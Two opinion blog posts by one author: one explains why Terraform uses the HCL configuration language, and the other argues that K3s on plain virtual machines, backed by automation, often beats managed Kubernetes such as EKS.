Lakshmi Narasimhan — Tue, 23 Sep 2025 00:00:00 +0000

If you hang around DevOps Twitter or Reddit long enough, you’ll stumble across a familiar fight:“Why does Terraform use HashiCorp Configuration Language (HCL) instead of a real programming language?”

Half the crowd insists HCL is the perfect middle ground. The other half sees it as YAML’s slightly hipper cousin — still clunky, but with more curly braces.

So, how did we end up with HCL at the center of infrastructure-as-code? And what would’ve happened if Terraform had just picked Python or Go instead?

HCL’s Origin Story(I think)

Terraform needed something that ticked a very specific set of boxes:

Human-readable syntax: not just for developers, but for ops folks and managers who only glance at infra configs.
Declarative, not imperative: you declare what you want, Terraform figures outhow to get there.
Machine-friendly: structured enough for parsing and state reconciliation, flexible enough for humans to write without crying.

JSON was technically supported from day one. Nobody used it. Too verbose, too painful. HCL struck the balance.

Why Not Just Use a “Real” Language?

Imagine Terraform configs in Python. Sounds nice. Until you realize you’d need to write orchestration logic for every single dependency. Want an S3 bucket before your EC2 instance? Better remember to write thatawait_bucket() function.

Terraform’s declarative model saves us from that nightmare. By hiding the “how,” it:

Reduces mistakes and redundancy.
Keeps configs readable across teams, even for folks who aren’t software engineers.
Manages state safely (rollbacks in Python would be a comedy of errors).

General-purpose languages give you infinite flexibility. But in infrastructure, infinite flexibility often means infinite footguns.

The Trade-off

Of course, HCL isn’t perfect. Anyone who’s wrestled withfor_each and dynamic blocks knows it can feel like you’re fighting the language. And yes, sometimes you wish you could just drop a real loop or function in there.

But that friction is intentional. HCL’s “simplicity ceiling” prevents configs from turning into full-blown software projects. Terraform wants you thinking about infrastructure states, not writing infra-flavored spaghetti code.

The fight over HCL isn’t really about syntax. It’s about philosophy:do we want infrastructure to look like code, or like configuration?

HashiCorp bet on configuration — and for all the complaints, that bet made Terraform the standard. If it had been a Python library, it probably would’ve ended up as just another provisioning framework.

HCL isn’t beautiful, but it’s pragmatic. It forces us to think declaratively, keeps the focus on infra states, and saves us from writing orchestration logic by hand.

So the next time someone complains “Why not just use Go/Python/TypeScript?”, the answer is simple:
Terraform doesn’t want you to write software. It wants you to write infrastructure.

]]>

When DIY Beats Managed Kubernetes

Lakshmi Narasimhan — Sun, 21 Sep 2025 00:00:00 +0000

When I first started working with Kubernetes, I immediately gravitated toward managed offerings like EKS, GKE, and AKS. The promise was compelling: let AWS/Google/Azure handle the control plane while you focus on your applications. Fast forward a few years, and I’ve come to a somewhat contrarian position—for many teams, especially those with some ops capability, running K3s on virtual machines often makes more sense than using managed Kubernetes.

Let me explain why, and the important caveats to make this approach work.

The Managed Kubernetes Tax

Managed Kubernetes services aren’t free—and I’m not just talking about the literal cost (though that’s significant). They come with several forms of “tax”:

Financial cost: You pay for control plane(s), often per cluster. For small to medium workloads, this can be disproportionately expensive.
Complexity tax: Managed K8s integrates deeply with cloud provider infrastructure—IAM, networking, storage—adding layers of abstraction and potential failure points.
Upgrade friction: Managed K8s upgrades are often more complex than they need to be, involving node group rotations and potential downtime.
Cognitive overhead: You still need to understand Kubernetes, plus the cloud provider’s implementation quirks and limitations.

Take EKS, for example. What starts as “just let AWS manage the control plane” quickly spirals into wrestling with IAM roles for service accounts, custom CNIs, AWS Load Balancer Controllers, and cluster autoscaler configurations that mysteriously stop working after upgrades. I’ve spent entire days debugging issues that stemmed from the interaction between EKS and AWS’s underlying services—time that could have been spent improving our actual applications.

Enter K3s: Kubernetes Without the Bloat

K3s is a certified Kubernetes distribution designed for resource-constrained environments. It’s packaged as a single binary under 100MB and uses significantly fewer resources than standard K8s. But don’t let the “lightweight” label fool you—K3s is a production-grade distribution that powers everything from IoT devices to large-scale production systems.

When deployed on standard VMs (whether AWS EC2, DigitalOcean Droplets, or your own infrastructure), K3s offers several advantages:

Simplicity: A K3s cluster can be bootstrapped with a single command. No complex cloud provider integration required.
Cost efficiency: Run your entire control plane and worker nodes on standard VMs, often at a fraction of the cost of managed offerings.
Portability: Your setup works the same way regardless of where your VMs are hosted, making multi-cloud and hybrid deployments straightforward.
Easier upgrades: K3s upgrades can be as simple as replacing a binary and restarting a service.
Full control: No mysterious behavior or limitations imposed by the cloud provider’s implementation.

The Critical Caveat: You Need Automation

Here’s where I need to be clear: this approach only makes sense if you invest in automation. You’re essentially building your own management layer, which requires:

Infrastructure as Code: Your entire VM fleet and K3s deployment should be defined in Terraform, Pulumi, or similar.
Automated scaling: Scripts or tools that can add/remove nodes based on cluster metrics.
Upgrade playbooks: Well-tested procedures for upgrading K3s versions with minimal disruption.
Monitoring and alerting: Comprehensive visibility into both VM and Kubernetes-level metrics.
Backup and disaster recovery: Regular etcd snapshots and documented recovery procedures.

Without these elements, you’re likely better off with managed Kubernetes. The goal isn’t to recreate every feature of EKS/GKE/AKS, but to build a simpler, more focused system that meets your specific needs.

Real-World Example

For one of my recent projects, we replaced an EKS cluster costing roughly $250/month (control plane + required minimum nodes) with a K3s setup on three small VMs totaling $60/month. The migration took 3 days, and we’ve had fewer operational issues since.

Our automation includes:

Terraform for VM provisioning
Ansible for K3s installation and configuration
Custom scripts for horizontal scaling based on node resource utilization
Prometheus + Grafana for monitoring
Weekly etcd snapshots stored in S3

The entire setup is documented in a Git repository, and new team members can spin up a local replica for testing using Vagrant.

The maintenance complexity with EKS was what ultimately pushed us over the edge. Every few months, AWS would deprecate something or introduce a new “recommended” way to handle networking, storage, or access control. We’d spend days reading through documentation changes and testing upgrades in staging environments. With K3s, upgrades are predictable and focused on Kubernetes itself, not the surrounding ecosystem of AWS-specific components.

When to Stick with Managed Kubernetes

This approach isn’t for everyone. You should probably stick with managed Kubernetes if:

You have large, complex clusters with hundreds of nodes
Your team has limited operations expertise
You need advanced features like managed node auto-scaling groups
You’re heavily invested in cloud-provider specific features

Conclusion

The beauty of the K3s-on-VMs approach is that it strips Kubernetes down to what it does best—orchestrating containers—without the added complexity that comes from deep cloud provider integration.

By building your own lightweight management layer through automation, you get the benefits of Kubernetes with more control, often at a lower cost. The key is being honest about your team’s capabilities and needs.

For startups, indie hackers, and teams that value simplicity and cost-efficiency, this approach is worth considering. You might find that a little investment in automation pays significant dividends in both cost savings and reduced operational complexity.

Of course, if you enjoy spending your weekends debugging why your EKS cluster suddenly can’t talk to your RDS instances despite no apparent changes, then by all means, stick with managed Kubernetes. Some people also enjoy jigsaw puzzles with missing pieces.

]]>